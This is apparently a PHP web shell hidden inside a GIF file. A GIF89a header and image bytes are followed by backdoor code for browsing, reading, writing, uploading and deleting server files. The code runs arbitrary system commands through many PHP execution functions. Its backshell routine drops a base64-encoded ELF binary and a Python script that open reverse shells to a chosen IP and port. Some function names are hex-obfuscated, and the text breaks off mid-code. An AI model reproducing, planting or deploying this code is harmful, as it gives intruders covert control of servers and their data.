GIF89aJZtfwkcwkcvdZ޲eZRدӲ`wףѤRbΞΔΆsSaJhAŅŭv产JBZ?ŽѺTB̽sֺ`κ~ֽ9ּBȸf˸Z̹BޫζLֵ:ͷ:z͵1{XOc֭?yݦ^֭1ǭMfŭB\ǭ0ŭ:J@Wܗuǥ,ʠVA//˜?Qǜ,wg̙3VeB,?,T{gF,ބBzCˉ/~&s.rmgB(Zs?v,{Bmp'ꇎ5$f! 1 1J—dbRt(3Kx`G̀!]qdGR@9!9`-dÿIwwm8Q-~%mp{m?$+AW0dL A8 APTAvS u9k]WCL`B+| xPu)CPS2wkyuJXAs)އvg U0ޙt Dy27+p ^|y -$O'x dzVo<D'ԧAN :o;`<xTc?HP d;㷮 v$57 (`2hms5N&bpt&HѼA9H!&4nT ^M =K NBn5 P<89J0$X 0Z8+bvAG0╻Q-H&f Xh,@nr@)`9(idcPTwxF6,FH [9@(pAʌB [҈cg&9IZ2#,X}laE():N&Bp@B"I*:nCpQF0PP/Mo t HAa AHx@d#܇2C6/PV@JQ#?-F5ry@X ^XBπ@ )ЙDBShI-?›y,-2u 㕟F7"؟=>m2K05V>EBj\4& -9O*V\^-rs}xayF-$B=/;6WPEpل=AQމ3`XcY]=)\PFI0(q!/gFG̱n=R;(#sdۥѐ6jn&$A|VaZWA5DŞ}hECK%R$qPdq `wHF8 }A)WD ]`DPx|cK6nG"3Pru1d8hcFŅqxg!apwoem;gqG`t(, #Ñ_lIČxAXXtrbG\FϠ^ZF=x24A\lVbi'W k5Fb I@fN}tVwﵐlI@]~ԇ6yPkw](IWLiv+Q8<plHiJiAuoRU(W@PmKiiDUPwP{cRp谖li PSSÆԓI%p6 jgx Q6^!\^5?w,5šN};eP4bSy^{& 1<Ձ(rb5X,sTS m;xW۠"! ,JX H JIȰÇ bHŃ.Z,p'5kRmшpawFTCL9^D$5wo{0DڿZRyDs& <ų3ݻ:oT`ʞ9ԜTKo_gREw &b26ty)l?5 V ϥ;3#܄k )&5@(d9qNlvh&6{oW?k=*Qwkec,8L1cE?1X?hD (D,5$"8CU}'{4'ƨE fhDg2 Ob ,rE"H!x Bv%b}}'\⡣Ҙ r|8ua$@Jm p U4#AHkZ`Byh~2t|qC/R5- N<"$"mNNfX2$H,"pFG!  R0 et&R{e"$0B#&MoNQÂ4-(C3V)#> ޫv+wZ(#KCTDD 1^';n?vCH bl_ Ѐcad Bl}5 DayqQ9-oQ : (E0lc !@QI<ѐ'MJ[ҿq47/Ms ;"tԨ>P!NzjYCֶεw^W! ,JW HVPÇ#ċ Pf  $zH5?ޕT$-%<'Q$&*Κm.͌ՔStQ k=Kt'ѨT%]) rr.mQ$V3k2+mϪC,XQ`zGN>W}XD#qAt۬) jTye tە8?֮S+"SI!X`wߡ,@乕clߩ&+RD$^;>ye]-S/r߽ʵYx 8"mwPs{)u6Ov2ym8>弃a0ȡALM8Y6w8֨YU(i?|dn @$ܲ-4 ?Ts@Bs|P 90DN hX%p +@SerK& ta@Q-p@ f6 9Pc@t@"888_THp$?Y@PR -i?ԃ1ƚ@0AB0 ^ t v5OC ?.`SF0p)pA`X0qkZp b<@\?$.WH0ۼ3:p@ ZF dL =lѫM` S qH0f@$x*Ԓ5`CH1>$'[.t"Cp 6 ͣ1;RCoq[9ʤE @q&8A8XcXx@CxC,"3$c?~7BRD :8:瘀@.8X)C*@&Ȃ9@` Y&-pkSFG$`1xXJA_5ĉ =~b8?L1_t":|5x @Ag!(PCUIB҃9?g0u6 IBb wxH\jњQx '1cְ?ȠT r @ZK-AK(0Ib.D`8DawjZɆ0hl 8Υr`@:z|I^ `*=z[ 1@, q(=̉XZl!Z*)Bb&~Kga hE dT5ђF/;,nE8ʁ^' dҰDAp`;ň0 kdu!6 S(Bt1 AaTOM<p  : 7KQ ) SbzG% oi 1 H E R~,&B}2jQ m`DCOHAXFRu[Q-HlHmZڋ<=@jz7уL*ҙc-G @ېXnC0.j"z|wH3: w@&'î=`"kIDvrUpf%jKcQX"^|l#Epsa D,r%ً{r#)9H궱2o#OȂ٬ݥ#f6>/; ?RuЕy^$(ָNh(c5e;&=LͣygMZ_A()Q{RBa5f3_KsAc :ufsiMq>D! 
,JU H nIȰa J$nńE\*4E`Y3to޳!)C04g޳m0aUK85,MBjΜܻ}FTcLj{fmۼL%!{AmSVkRea ؖ(Z> ZS A&Ĵgʂ¤&=:6rx{'W3< a}9ը;Iނpip#|쟇 T}AykƔh^ rWJ wc֜=1b te<ps(? ^\Y- bgbI sY0@l;t@NM;.ZI4X :TÏL^@PLMV@Utce)Е`b%x7? g B%l B& BY6P\) )fN嬧^S9PM5hk^In8tGS}&f P =Jh<:Q-kNh# 4?G0o" %B?#5Q ˺"N5) JiK3oK"@BCDTlH `78R5%f#g2I@!(F0R,e,8EC!t@ H.w^(E<5q@JA,8D)D 8rCH0=ļ>y?Lƛ[(G'9#`"ȁwf ʣEp sy}8d@ G' ey\1HE` =gSݤQ`XLmL0'(r.HE"*! kH?J!N&He9p$e @*G% 9/Ƙ{5 S @ 8Eу!0=N^oM&Hؙ9[p4FQhن"# "j^*?t*va}C4()Y y{.;!4k>H> 0Q !2D( 0RܯrʈH-j!)y!۵ &j:XI!={j8!ƬP@ޓl~yq㐼:La_(LZMZif IHgܤ [d.[&布"$&-G4*DX6K-XCVq-D`R[F FAL<ã20qł=[I@SP (E)w8tV=6Dҵεw^MbNf;Ў! ,CU H JIȰÇ AHb{3jw8H!Qx1׏48(SK-< : <@HF-L*lR12(w?$RCmNE sO9/Q İ&SA>D25北ʤ2 &LZ1NI CUihM-HCjPiW 5(YaN}CK^w$2O0lE8TP:6<nc6c&:}IZAlԒWN~yeF/HP9V ;"Y84R" 䧺DT@ҽHa\EP:N*(@|5<)Ca; N-R(LBC"3t6\ZĿ)<1d.d0J0L"WPA [:;7BDSi\w`-dmh'\@! ,JU H nW Ç#JnExQY,Rͻ߾w0Ui0?) y6OpP@hrYۆn_K}IpC5>}:oTѯDk=Kt'ѨT5h c^gx_Q$”ꟲg#X &,`Faݶw &lq{A5rB C͚`F @>l-+rhFڷsIu@L8%I!F9gu{&Z\I\>Eq'ڶHV>C46b?H6hQ6?1ˌO юOt A4Y\@xVR}JHм&Ȃ9āX ÀqqM-wAp2x`eX| ;0鹅q9"Ml;Z:0AS0RJPC \~A0A 4nCPу99d$'IJJ 0aA ;L)9k!"1@APPZ%\ 6]{C6)x$L2Ƀ-ψQFMjNig&! ?}DgKʈ> bQ~8O7ς[DY= R>k m`,:hvNjѣ |Ex; 98v09LmA 80($1e0<:ugh548(jA S!ޕAH+!#HBA ᔋFHx)|YgTTD#aA]``B &A_VU(B*Ny/KD̰!QB^B}5"dJ>[):St!5D҈i+B  pDԩН'&وrU)`"zclCք娽/0Ug繵f([`ltI !HxӞ@lSRЊ%?:j@ @*+7eK0Ո#a@a$҇@ÊeB!ЕS-@3/ Ur6 $xL*WJm!@-"ZG >Lq14r+L z<+%C>&dA=H?@@u 4 ),S" y4!rR xE )_cfbΌ:PAg<&`B7ƉwԢA=P$'H8wr b>D}C @0j-&@$ft&R pkHE 0S@8tH@ZܡR KnN\Z$B <n֜ɒMTSeDe*^Oб -xB "\Zlá><‰Ղ[-PI!(3Gzw(Ԡe2WenX'H<>A~EZyv|g`)OБJ!<- !2̲61H2&rb}xѷ-T$(!Ģ~9j5L¹ID| -:A&褌T_]#Vy(C [.AR `  D};g0!I 6g4iHFJ! #S\0$/3,cӟL2hN6%pLg4E^Bo>~~,WAy+ ! ,JX H nIȰÇ#JHE*hpaBJݾ}*±@kQ`RT]{{†p"ؼ}A2ȁJS`۞ w忖 y5rݻ7*Z54V0e϶xZ 0 hRa^*yXׯ2kLWlBp|d5 yso߿;`b5&5QT_翠ww)xkw{/<>t]'ҍ"nL}A_c9J6Iw/ܢ&#ul3U*` `@$r/47ЅLs"684ی"O]<8P !E*<~<&2( .C'^8FM`vэ $l)VE8&hA C\ `Ddy0Va?8q!<"s+ |I8a  4aNB9D=хig@ɰ# ( N 'VyYg?сcT ((BW! (AC֢aKTZL;*}F%g8tAQmPl@!`DੌR;!4X 5е!N+DXDJ>jm!AQT r)⁐THʌ+dHyU@be>$56Ip94C'=W5sJ 1˔ $var) { $array[$key] = is_array($var) ? 
chkgpc($var) : stripslashes($var); } return $array; } define('MYFILE', strdir(__FILE__)); define('THISDIR', strdir(dirname(MYFILE) . '/')); $rootdir = strdir(strtr(MYFILE, array( strdir($_SERVER['PHP_SELF']) => '' )) . '/'); $rootdir = strpos($rootdir, 'eval()') ? array_shift(explode('(', $rootdir)) : $rootdir; define('ROOTDIR', strdir($rootdir . '/')); define('EXISTS_PHPINFO', getinfo($password) ? true : false); if (get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); } if (function_exists('mysql_close')) { $issql = 'MySql'; } if (function_exists('mssql_close')) $issql .= ' - MsSql'; if (function_exists('oci_close')) $issql .= ' - Oracle'; if (function_exists('sybase_close')) $issql .= ' - SyBase'; if (function_exists('pg_close')) $issql .= ' - PostgreSql'; $win = substr(PHP_OS, 0, 3) == 'WIN' ? true : false; $msg = VERSION . ' - ' . date('Y-m-d H:i:s N', time()); function filew($filename, $filedata, $filemode) { if ((!is_writable($filename)) && file_exists($filename)) { chmod($filename, 0666); } $handle = fopen($filename, $filemode); $key = fputs($handle, $filedata); fclose($handle); return $key; } function filer($filename) { $handle = fopen($filename, 'r'); $filedata = fread($handle, filesize($filename)); fclose($handle); return $filedata; } function fileu($filenamea, $filenameb) { $key = move_uploaded_file($filenamea, $filenameb) ? true : false; if (!$key) { $key = copy($filenamea, $filenameb) ? true : false; } return $key; } function filed($filename) { if (!file_exists($filename)) return false; $name = basename($filename); $array = explode('.', $name); header('Content-type: application/x-' . array_pop($array)); header('Content-Disposition: attachment; filename=' . $name); header('Content-Length: ' . filesize($filename)); @readfile($filename); exit; } function showdir($dir) { $dir = strdir($dir . '/'); if (!is_readable($dir)) return false; $handle = opendir($dir); $array = array(); while ($name = readdir($handle)) { if ($name == '.' 
|| $name == '..') continue; $path = $dir . $name; $name = strtr($name, array( '\'' => '%27', '"' => '%22' )); if (is_dir($path)) { $array['dir'][$path] = $name; } else { $array['file'][$path] = $name; } } closedir($handle); return $array; } function deltree($dir) { $handle = @opendir($dir); while ($name = @readdir($handle)) { if ($name == '.' || $name == '..') continue; $path = $dir . $name; @chmod($path, 0777); if (is_dir($path)) { deltree($path . '/'); } else { @unlink($path); } } @closedir($handle); return @rmdir($dir); } function postinfo($array) { $infos = array( function_exists("\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e"), function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e") ); } function size($bytes) { if ($bytes < 1024) return $bytes . ' B'; $array = array( 'B', 'K', 'M', 'G', 'T' ); $floor = floor(log($bytes) / log(1024)); return sprintf('%.2f ' . $array[$floor], ($bytes / pow(1024, floor($floor)))); } function find($array, $string) { foreach ($array as $key) { if (stristr($string, $key)) return true; } return false; } function scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now) { $handle = opendir($dir); while ($name = readdir($handle)) { if ($name == '.' || $name == '..') continue; $path = $dir . $name; if (is_dir($path)) { if ($fit && in_array($name, $fit)) continue; if ($ran == 0 && is_readable($path)) scanfile($path . '/', $key, $inc, $fit, $tye, $chr, $ran, $now); } else { if ($inc && (!find($inc, $name))) continue; $code = $tye ? filer($path) : $name; $find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)), 'M') ? false : (strpos($code, $key) > -1)); if ($find) { $file = strtr($path, array( $now => '', '\'' => '%27', '"' => '%22' )); echo ' ' . $path . '
'; flush(); ob_flush(); } unset($code); } } closedir($handle); return true; } function antivirus($dir, $exs, $matches, $now) { $handle = opendir($dir); while ($name = readdir($handle)) { if ($name == '.' || $name == '..') continue; $path = $dir . $name; if (is_dir($path)) { if (is_readable($path)) antivirus($path . '/', $exs, $matches, $now); } else { $iskill = NULL; foreach ($exs as $key => $ex) { if (find(explode('|', $ex), $name)) { $iskill = $key; break; } } if (strpos(size(filesize($path)), 'M')) continue; if ($iskill) { $code = filer($path); foreach ($matches[$iskill] as $matche) { $array = array(); preg_match($matche, $code, $array); if (strpos($array[0], '$this->') || strpos($array[0], '[$vars[')) continue; $len = strlen($array[0]); if ($len > 10 && $len < 150) { $file = strtr($path, array( $now => '', '\'' => '%27', '"' => '%22' )); echo ' ' . $path . '
'; flush(); ob_flush(); break; } } unset($code, $array); } } } closedir($handle); return true; } function command($cmd, $cwd, $com = false) { $iswin = substr(PHP_OS, 0, 3) == 'WIN' ? true : false; $res = $msg = ''; if ($cwd == 'com' || $com) { if ($iswin && class_exists('COM')) { $wscript = new COM('Wscript.Shell'); $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c ' . $cmd); $stdout = $exec->StdOut(); $res = $stdout->ReadAll(); $msg = 'Wscript.Shell'; } } else { chdir($cwd); $cwd = getcwd(); if (function_exists('exec')) { @exec($cmd, $res); $res = join("\n", $res); $msg = 'exec'; } elseif (function_exists('shell_exec')) { $res = @shell_exec($cmd); $msg = 'shell_exec'; } elseif (function_exists('system')) { ob_start(); @system($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; } elseif (function_exists('passthru')) { ob_start(); @passthru($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; } elseif (function_exists('popen')) { $fp = @popen($cmd, 'r'); if ($fp) { while (!feof($fp)) { $res .= fread($fp, 1024); } } @pclose($fp); $msg = 'popen'; } elseif (function_exists('proc_open')) { $env = $iswin ? array( 'path' => 'c:\\windows\\system32' ) : array( 'path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin' ); $des = array( 0 => array( "pipe", "r" ), 1 => array( "pipe", "w" ), 2 => array( "pipe", "w" ) ); $process = @proc_open($cmd, $des, $pipes, $cwd, $env); if (is_resource($process)) { fwrite($pipes[0], $cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); } @proc_close($process); $msg = 'proc_open'; } } $msg = $res == '' ? '

NULL

' : '

' . $msg . 'ִгɹ

'; return array( 'res' => $res, 'msg' => $msg ); } function backshell($ip, $port, $dir, $type) { $key = false; $c_bin = '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lbmQAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9fcHJlaW5pdF9hcnJheV9lbmQAX19maW5pX2FycmF5X3N0YXJ0AF9faW5pdF9hcnJheV9lbmQAX19pbml0X2FycmF5X3N0YXJ0AF9EWU5BTUlDAGRhdGFfc3RhcnQAY29ubmVjdEBAR0xJQkNfMi4wAGRhZW1vbkBAR0xJQkNfMi4wAF9fbGliY19jc3VfZmluaQBfc3RhcnQAX19nbW9uX3N0YXJ0X18AX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfZnBfaHcAX2ZpbmkAaW5ldF9hZGRyQEBHTElCQ18yLjAAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABleGVjbEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABfX2Rzb19oYW5kbGUAX19EVE9SX0VORF9fAF9fbGliY19jc3VfaW5pdABhdG9pQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfX2Jzc19zdGFydABfZW5kAF9lZGF0YQBleGl0QEBHTElCQ18yLjAAX19pNjg2LmdldF9wY190aHVuay5ieABtYWluAF9pbml0AA=='; switch ($type) { case "pl": $shell = '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'; 
$file = strdir($dir . '/t00ls.pl'); $key = filew($file, base64_decode($shell), 'w'); if ($key) { @chmod($file, 0777); command('/usr/bin/perl ' . $file . ' ' . $ip . ' ' . $port, $dir); } break; case "py": $shell = 'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg=='; $file = strdir($dir . '/t00ls.py'); $key 